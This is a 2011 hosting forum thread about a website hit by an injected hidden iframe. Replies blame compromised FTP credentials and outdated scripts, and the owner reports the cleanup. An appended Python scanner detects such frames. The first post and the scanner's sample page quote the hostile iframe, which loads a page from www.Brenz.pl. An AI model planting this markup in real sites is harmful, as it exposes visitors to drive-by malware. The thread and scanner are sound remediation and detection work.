Virus Attack - Website Blocked!

  #1  
Old 01-01-2011, 02:24 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25

Virus Attack - Website Blocked!


Hello, Google tells us the following code is in every one of our pages. We have tried to remove this code, but it is added automatically within seconds. Google has also temporarily blocked our main website for the public.

Please advise,

--
Code:
--
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>


Last edited by AJKservers; 01-01-2011 at 02:27 AM.
  #2  
Old 01-01-2011, 02:26 AM
Steven Steven is offline
Problem Solver
 
Join Date: Mar 2003
Location: California USA
Posts: 13,073
Is this a shared hosting account? If so, contact your host.

If it is a dedicated server or VPS, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, PHP shell, or even through FTP.

Can you give us more information please?

__________________
Steven Ciaburri | Proactive Linux Server Management - Rack911.com
System Administration Extraordinaire | Follow us on twitter:@Rack911Labs
Managed Servers (AS62710), Server Management, and Security Auditing.
www.HostingSecList.com - Security notices for the hosting community.

  #3  
Old 01-01-2011, 02:30 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
Quote:
Originally Posted by Steven View Post
Is this a shared hosting account? If so, contact your host.

If it is a dedicated server or VPS, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, PHP shell, or even through FTP.

Can you give us more information please?
There are many of our websites running on the same server. It's a dedicated server running cPanel/WHM. ONLY, our main website is affected http://www.AJKservers.co.uk

I do not have any more information at the moment, as we just noticed this activity and posted here for comments and advice on preventing this kind of activity. I would need to find the source of this code, but I don't know where to start.


Last edited by AJKservers; 01-01-2011 at 02:36 AM.
  #4  
Old 01-01-2011, 03:54 AM
steven_elvisda steven_elvisda is offline
Junior Guru
 
Join Date: Jun 2009
Posts: 191
Hello AJKservers,

I think you should check your code again, because your computer is infected by a virus and it has infected your HTML file.

Please try.

  #5  
Old 01-01-2011, 05:32 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
Quote:
Originally Posted by steven_elvisda View Post
Hello AJKservers,

I think you should check your code again, because your computer is infected by a virus and it has infected your HTML file.

Please try.
You're right, but I have already re-installed the OS, updating Windows, Windows Defender and other anti applications. I am trying to remove the code from every page again, and I hope it won't happen again.

Thanks for your comments, guys.

  #6  
Old 01-01-2011, 08:54 AM
madaboutlinux madaboutlinux is offline
Web Hosting Master
 
Join Date: Jul 2009
Posts: 1,543
Quote:
Originally Posted by AJKservers View Post
You're right, but I have already re-installed OS
Re-installed the OS of your server or local machine? Such injections are performed via FTP or a compromised script on your server. Re-installing the server OS and removing the 'iframe' code won't make any difference if the compromised script is still under your account.

If the injection is performed by hacking the FTP password, re-installing your local machine would sort things out for you. For now. But make sure you install a firewall and limit FTP access to your own IPs so such issues can be minimized.

__________________
| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

  #7  
Old 01-01-2011, 11:59 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
Quote:
Originally Posted by madaboutlinux View Post
Re-installed the OS of your server or local machine? Such injections are performed via FTP or a compromised script on your server. Re-installing the server OS and removing the 'iframe' code won't make any difference if the compromised script is still under your account.

If the injection is performed by hacking the FTP password, re-installing your local machine would sort things out for you. For now. But make sure you install a firewall and limit FTP access to your own IPs so such issues can be minimized.
Actually, the website was infected from our own local computer via FTP. There was no third party involved. However, the management of the server has also been notified at the time to take further security measures.

Anyways, I appreciate your response to this thread, madaboutlinux.

  #8  
Old 01-02-2011, 10:02 PM
onnoysomoy onnoysomoy is offline
Junior Guru Wannabe
 
Join Date: Sep 2010
Location: Bangladesh
Posts: 84
This happens when someone uses any nulled version of scripts.

__________________
Shared Hosting by Hosting Divine
Fast, Affordable & Reliable Web Hosting
24/7 365 Support, 99.99% Network Up-time Guarantee

  #9  
Old 01-02-2011, 10:59 PM
KMyers KMyers is offline
Technical Nutcase
 
Join Date: Mar 2009
Location: Miami, Florida
Posts: 18,619
Quote:
Originally Posted by onnoysomoy View Post
This happens when someone uses any nulled version of scripts.
Hello,
Actually, this happens more with people using outdated scripts with known exploits (PSA for those who are using a 3-year-old version of WordPress or Joomla). Nulled scripts are more notorious for data leaks or backdoors.

__________________
Keith M.- CTO
VPS | Cloud Resource Pools | Dedicated Servers | Colocation
99.999% Uptime | 24x7x365 Support | onApp Powered Cloud | Global Data Centers
Big Brain Global Networks | A Division of Big Brain, LLC

  #10  
Old 01-03-2011, 12:13 AM
mugo mugo is offline
Intangible Asset Appraiser
 
Join Date: Mar 2009
Location: Austin Tx
Posts: 1,973
The most usual attack is from sniffed FTP passwords in this form of iframe attack.
First off, either your machine is being sniffed, or someone allowed an insecure script that let someone in to run a plain-text sniffer.

At the least, you will need to change the FTP passes, but after you are sure the sniffer is gone, or do it locally if you are sure it's network based.
Better, switch from the insecure FTP to at least SFTP, which can be encrypted and not sniffed.

I've seen, literally, about 20 different ways the FTP password was compromised... weak passes (brute-force attacks), sniffers, compromised configs (containing passes), "notes" left in bad places...

Most of these are hacked either with close-network password sniffs, or a bad script on someone's web site that allowed an upload and execution of a local sniffer (usually an old or misconfigured WordPress or Joomla, as KDisk said), but there is probably a 95% chance this has to do with a compromised FTP password.

__________________
This is the best signature in the world....Tribute!
(It is not the best signature in the world, no. This is just a tribute)


  #11  
Old 01-03-2011, 12:40 AM
steven_elvisda steven_elvisda is offline
Junior Guru
 
Join Date: Jun 2009
Posts: 191
Quote:
Originally Posted by KDisk View Post
Hello,
Actually, this happens more with people using outdated scripts with known exploits (PSA for those who are using a 3-year-old version of WordPress or Joomla). Nulled scripts are more notorious for data leaks or backdoors.
Hello AJKservers,

I agree with these ideas. Please check your CMS components, or check your code, especially your JavaScript code. Sometimes when you copy some verify code for jQuery or Ajax, it will harm your website. One other thing: I suggest you use the FTPES protocol in your FileZilla FTP client to upload your files.

  #12  
Old 01-03-2011, 04:52 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
We never used nulled scripts. The software on our local computers was outdated; Windows Defender and antivirus software were also outdated.

Thank you guys for your comments and suggestions. We have updated all scripts, including CMS, forums etc., secured the local computer, secured the server, changed passwords, and removed the iframe from pages.

Google has also unblocked our website within 3 hours of doing all things. It's now over 35 hours and everything is going good.
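
Added example, not part of the original thread and not any poster's code: a cleanup-side sweep for the kind of frame quoted in the first post. It walks a document root and reports iframes that are both hidden (0/1px size or a hiding style) and loaded from a host outside an allow-list, with each file's modification time for matching against FTP transfer logs. The allow-list host `example.test`, the function names and the sample page are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that make a frame effectively invisible to a visitor.
HIDDEN_STYLE = re.compile(
    r"(?:width|height)\s*:\s*[01](?:px)?\s*(?:;|$)|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class IframeFinder(HTMLParser):
    """Collect (line, src) for hidden iframes that load from a foreign host."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        tiny = any(a.get(k, "").strip().rstrip("px") in ("0", "1") for k in ("width", "height"))
        hidden = tiny or bool(HIDDEN_STYLE.search(a.get("style", "")))
        # A visible third-party embed is normal; hidden plus off-site is the warning sign.
        if host and host not in self.own_hosts and hidden:
            self.hits.append((self.getpos()[0], a["src"]))

def scan_docroot(root, own_hosts, exts=(".html", ".htm", ".php")):
    """Return [(path, line, src, mtime)]; mtime is when the file was last rewritten."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(exts)):
            path = os.path.join(dirpath, name)
            finder = IframeFinder(own_hosts)
            with open(path, encoding="utf-8", errors="replace") as fh:
                finder.feed(fh.read())
            findings += [(path, l, s, os.path.getmtime(path)) for l, s in finder.hits]
    return findings

# Constructed sample page: a visible off-site embed (line 2) and the thread's frame (line 3).
SAMPLE = ('<html><body>\n<iframe src="https://video.example.net/e/1" width="560" height="315"></iframe>\n'
          '<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>\n'
          '</body></html>\n')

def demo(own_hosts=("example.test",)):
    """Write SAMPLE into a temporary docroot and return (file, line, src) findings."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write(SAMPLE)
        return [(os.path.basename(p), l, s) for p, l, s, _ in scan_docroot(root, own_hosts)]
```

Files that are flagged again shortly after being cleaned point to a write path that is still open, which is the behaviour the first post describes.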
